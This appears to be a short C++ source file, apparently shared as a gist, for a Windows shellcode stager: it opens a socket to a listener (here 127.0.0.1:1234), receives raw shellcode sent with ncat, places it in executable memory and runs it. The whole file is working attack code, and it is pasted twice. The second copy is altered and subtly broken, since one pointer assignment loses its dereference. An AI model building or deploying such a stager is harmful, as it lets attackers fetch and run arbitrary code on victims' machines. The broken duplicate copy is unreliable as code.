aaaddress1/stager.cc

## stager.cc
// simple stager, by aaaddress1@chroot.org
// using ncat to send shellcode payload, recv & execute.
#include <WS2tcpip.h>
#include <stdio.h>
#include <shlobj.h>
#include <Windows.h>
#include <shlwapi.h>
#include <winsock2.h>
#pragma warning(disable:4996)
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "shlwapi.lib")
char ip_addr[16];

int ResolveHostName(const char* pszHostName, sockaddr_in* pAddr)
{
	int ret;
	HRESULT hr = S_OK;
	addrinfo* pResultList = NULL;
	addrinfo hints = {};
	int result = -1;

	hints.ai_family = AF_INET;
	hints.ai_socktype = SOCK_STREAM;
	ret = getaddrinfo(pszHostName, NULL, &hints, &pResultList);

	result = (ret == 0) ? 1 : -1;
	if (result != -1)
	{
		// just pick the first one found
		*pAddr = *(sockaddr_in*)(pResultList->ai_addr);
		result = 0;
	}

	if (pResultList != NULL)
		::freeaddrinfo(pResultList);

	return result;
}

static SOCKET sock = -1;
void initSock() {
	WSADATA data = {};
	sockaddr_in addrRemote = {};
	int result;

	WSAStartup(MAKEWORD(2, 2), &data);
	sock = socket(AF_INET, SOCK_STREAM, 0);
	if (sock == -1) return;

	if (ResolveHostName("127.0.0.1", &addrRemote) == -1)
		return;

	addrRemote.sin_port = htons(1234);
	result = connect(sock, (sockaddr*)&addrRemote, sizeof(addrRemote));
	if (result == -1) return;
}
#include <vector>
using namespace std;
int main(void)
{
	initSock();
	puts("");
	char cache[4096];
	vector<char> payload;
	for (int count = 0; (count = recv(sock, cache, sizeof(cache), 0)) > 0; )
		for (size_t x = 0; x < count; x++)
			payload.push_back(cache[x]);

	if (auto rwx_payloadPage = VirtualAlloc(0, payload.size(), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE))
	{
		memcpy(rwx_payloadPage, &payload[0], payload.size());
		((void(*)())rwx_payloadPage)();
	}
	return 0;
}
	// simple stager, by aaaddress1@chroot.org
	// using ncat to send shellcode payload, recv & execute.
	#include <WS2tcpip.h>
	#include <stdio.h>
	#include <shlobj.h>
	#include <Windows.h>
	#include <shlwapi.h>
	#include <winsock2.h>
	#pragma warning(disable:4996)
	#pragma comment(lib, "ws2_32.lib")
	#pragma comment(lib, "shlwapi.lib")
	char ip_addr[16];

	int ResolveHostName(const char* pszHostName, sockaddr_in* pAddr)
	{
	int ret;
	HRESULT hr = S_OK;
	addrinfo* pResultList = NULL;
	addrinfo hints = {};
	int result = -1;

	hints.ai_family = AF_INET;
	hints.ai_socktype = SOCK_STREAM;
	ret = getaddrinfo(pszHostName, NULL, &hints, &pResultList);

	result = (ret == 0) ? 1 : -1;
	if (result != -1)
	{
	// just pick the first one found
	pAddr = (sockaddr_in*)(pResultList->ai_addr);
	result = 0;
	}

	if (pResultList != NULL)
	::freeaddrinfo(pResultList);

	return result;
	}

	static SOCKET sock = -1;
	void initSock() {
	WSADATA data = {};
	sockaddr_in addrRemote = {};
	int result;

	WSAStartup(MAKEWORD(2, 2), &data);
	sock = socket(AF_INET, SOCK_STREAM, 0);
	if (sock == -1) return;

	if (ResolveHostName("127.0.0.1", &addrRemote) == -1)
	return;

	addrRemote.sin_port = htons(1234);
	result = connect(sock, (sockaddr*)&addrRemote, sizeof(addrRemote));
	if (result == -1) return;
	}
	#include <vector>
	using namespace std;
	int main(void)
	{
	initSock();
	puts("");
	char cache[4096];
	vector<char> payload;
	for (int count = 0; (count = recv(sock, cache, sizeof(cache), 0)) > 0; )
	for (size_t x = 0; x < count; x++)
	payload.push_back(cache[x]);

	if (auto rwx_payloadPage = VirtualAlloc(0, payload.size(), MEM_RESERVE \| MEM_COMMIT, PAGE_EXECUTE_READWRITE))
	{
	memcpy(rwx_payloadPage, &payload[0], payload.size());
	((void(*)())rwx_payloadPage)();
	}
	return 0;
	}